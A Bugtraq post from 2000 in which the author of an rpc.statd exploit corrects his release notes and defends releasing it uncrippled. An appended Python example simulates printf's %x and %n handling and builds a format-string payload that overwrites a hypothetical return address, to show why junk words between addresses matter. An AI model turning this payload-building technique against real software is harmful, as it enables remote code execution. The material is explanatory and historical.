Bugtraq mailing list archives

the rpc.statd exploit
From: ron1n - <shellcode () HOTMAIL COM>
Date: Tue, 8 Aug 2000 00:11:06 EST

Ok, this post has no technical content, but after I released my version of
the rpc.statd exploit, I realized I upset several people, so I'd like to
provide some corrective information. Here's my "exploit errata", so to
speak:

* 24th July, 2000 was the date I *started* the exploit. I now realize this
is misleading. I released the exploit 3 days after its completion. Those 3
days were spent testing and fixing -- a few things crept through unfixed,
but the exploit is fully functional. I did not cripple it, because in my
humble opinion, it doesn't "alleviate" any misuse of the code. Someone
always distributes fixed versions of crippled exploit code within days and
as far as I know, I am not the only one who has released an uncrippled
exploit.

* Two other exploits were released for this vulnerability -- (1) a Debian
exploit by drow for the PPC platform; (2) a generic Linux/x86 with a SuSE
default address by doing. Because of this disclosure, I did not imagine the
release of my version would trigger any hostility.

* I explicitly stated that I am not a security expert. The actual release
was my small contribution to something I thought I believed in. I guess I
had it all wrong, eh?

* My original idea of how to exploit the format string vulnerability was
incorrect. Specifically, the junk bytes between the return addresses were
not present, meaning the %n specifiers would have been short on addresses
(btw, the %!d specifiers were actually switched to %!x before release for
ease of calculations). I cannot say whether or not I would have discovered
my error during the coding stage, but major credit goes to smiler/z- for
clarifying this for me. I failed to give him the credit he deserved.

* I am not affiliated with any of the groups mentioned in the greets
section, and for that reason they cannot be held accountable for any
"stupidity" on my behalf.

Yes, this is entirely silly to the point of ridicule, but so be it.

Regards,
ron1n
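
The point in ron1n's fourth bullet, that without a junk word after each address the %n specifiers end up consuming the wrong stack words, is easy to see in a model. The following Python is an added example by the editor, not code from ron1n's exploit or from this post. It models printf's handling of literal bytes, %<width>x and %n over a list of 32-bit words standing in for the varargs on an x86 (little-endian) stack, assumes the format string buffer is reached after one filler word, and uses a hypothetical target address (where a saved return address would sit) and a hypothetical value to write there; widths are computed for the %Nx form ron1n says he switched to.

```python
import struct

# Hypothetical word printf pulls before the buffer is reached (an assumption of the model).
FILLER = 0xdeadbeef


def model_printf(fmt, stack, mem):
    """Toy printf: understands literal bytes, %<width>x and %n only.
    fmt is the format string as bytes, stack the list of 32-bit words printf
    would pull as varargs, mem a dict of byte address -> byte written by %n.
    Returns (chars_written, list of addresses %n wrote to)."""
    written, arg, targets, i = 0, 0, [], 0
    while i < len(fmt):
        if fmt[i] != 0x25:            # not '%': copied to the output, counts one char
            written += 1
            i += 1
            continue
        i += 1
        width = 0
        while 0x30 <= fmt[i] <= 0x39:  # optional field width
            width = width * 10 + (fmt[i] - 0x30)
            i += 1
        spec = chr(fmt[i])
        i += 1
        if arg >= len(stack):
            raise IndexError("%%%s ran off the end of the argument list" % spec)
        word = stack[arg]                # every conversion consumes one vararg word
        arg += 1
        if spec == 'x':
            written += max(width, len("%x" % word))
        elif spec == 'n':
            targets.append(word)
            for k in range(4):           # 4-byte little-endian store of the running count
                mem[word + k] = (written >> (8 * k)) & 0xff
        else:
            raise ValueError("unsupported conversion %" + spec)
    return written, targets


def build_payload(target, value, with_junk, junk=0x41414141):
    """Format string: the four byte-addresses of the target word, with or
    without a junk word after each, then one %<width>x%n pair per byte.
    Widths are chosen so the low byte of the running count equals the wanted
    byte at the moment each %n fires."""
    prefix = b''
    for k in range(4):
        prefix += struct.pack('<I', target + k)
        if with_junk:
            prefix += struct.pack('<I', junk)
    count = len(prefix)                  # the prefix bytes are output too
    specs = ''
    for k in range(4):
        want = (value >> (8 * k)) & 0xff
        width = (want - count) % 256
        if width < 8:                    # %x may print 8 digits; keep the width binding
            width += 256
        specs += '%%%dx%%n' % width
        count += width
    return prefix + specs.encode()


def stack_view(buf):
    """Vararg words as printf sees them: one filler word, then the buffer
    itself, since in the modelled scenario the buffer lives on the stack."""
    padded = buf + b'\x00' * (-len(buf) % 4)
    return [FILLER] + list(struct.unpack('<%dI' % (len(padded) // 4), padded))


def run(target, value, with_junk):
    """Returns (value now stored at target, how many %n writes hit target..target+3)."""
    mem = {}
    buf = build_payload(target, value, with_junk)
    _, targets = model_printf(buf, stack_view(buf), mem)
    hits = sum(1 for t in targets if target <= t < target + 4)
    stored = int.from_bytes(bytes(mem.get(target + k, 0) for k in range(4)), 'little')
    return stored, hits


if __name__ == '__main__':
    TARGET = 0xbffffa1c   # hypothetical: address of a saved return address
    VALUE = 0xbffff5a0    # hypothetical: address the shellcode would live at
    for junk in (True, False):
        stored, hits = run(TARGET, VALUE, junk)
        print("junk=%-5s stored=0x%08x hits=%d/4" % (junk, stored, hits))
```

With the junk words present each %Nx swallows a junk word and each %n lands on the next address, so all four writes hit and the target holds the wanted value. Without them the %Nx conversions eat the addresses themselves: only two %n writes reach the target word (one of them at the wrong byte) and the remaining two are handed words built from the ASCII of the format specifiers, which is exactly the "short on addresses" failure described in the post.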
